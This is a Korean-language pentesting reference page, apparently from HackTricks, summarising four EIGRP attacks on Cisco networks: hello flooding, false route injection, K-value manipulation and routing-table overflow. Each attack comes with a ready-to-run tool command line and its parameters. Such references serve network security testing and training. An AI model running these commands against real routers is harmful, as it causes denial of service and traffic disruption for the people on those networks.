EIGRP Attacks
Last updated
Last updated
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE) GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
이것은 https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 에 노출된 공격의 요약입니다. 추가 정보는 해당 링크를 확인하세요.
목표: EIGRP hello 패킷으로 라우터 CPU를 과부하 시켜 서비스 거부(DoS) 공격으로 이어질 수 있습니다.
도구: helloflooding.py 스크립트.
실행: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
매개변수:
--interface
: 네트워크 인터페이스를 지정합니다. 예: eth0
.
--as
: EIGRP 자율 시스템 번호를 정의합니다. 예: 1
.
--subnet
: 서브넷 위치를 설정합니다. 예: 10.10.100.0/24
.
목표: 잘못된 경로를 주입하여 네트워크 트래픽 흐름을 방해하고, 트래픽이 존재하지 않는 목적지로 향하게 합니다.
도구: routeinject.py 스크립트.
실행: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
매개변수:
--interface
: 공격자의 시스템 인터페이스를 지정합니다.
--as
: EIGRP AS 번호를 정의합니다.
--src
: 공격자의 IP 주소를 설정합니다.
--dst
: 대상 서브넷 IP를 설정합니다.
--prefix
: 대상 서브넷 IP의 마스크를 정의합니다.
목표: 변경된 K-값을 주입하여 EIGRP 도메인 내에서 지속적인 중단 및 재연결을 생성하여 사실상 DoS 공격을 발생시킵니다.
도구: relationshipnightmare.py 스크립트.
실행: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
매개변수:
--interface
: 네트워크 인터페이스를 지정합니다.
--as
: EIGRP AS 번호를 정의합니다.
--src
: 합법적인 라우터의 IP 주소를 설정합니다.
목표: 수많은 잘못된 경로로 라우팅 테이블을 채워 라우터의 CPU와 RAM에 부담을 줍니다.
도구: routingtableoverflow.py 스크립트.
실행: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
매개변수:
--interface
: 네트워크 인터페이스를 지정합니다.
--as
: EIGRP AS 번호를 정의합니다.
--src
: 공격자의 IP 주소를 설정합니다.
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE) GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)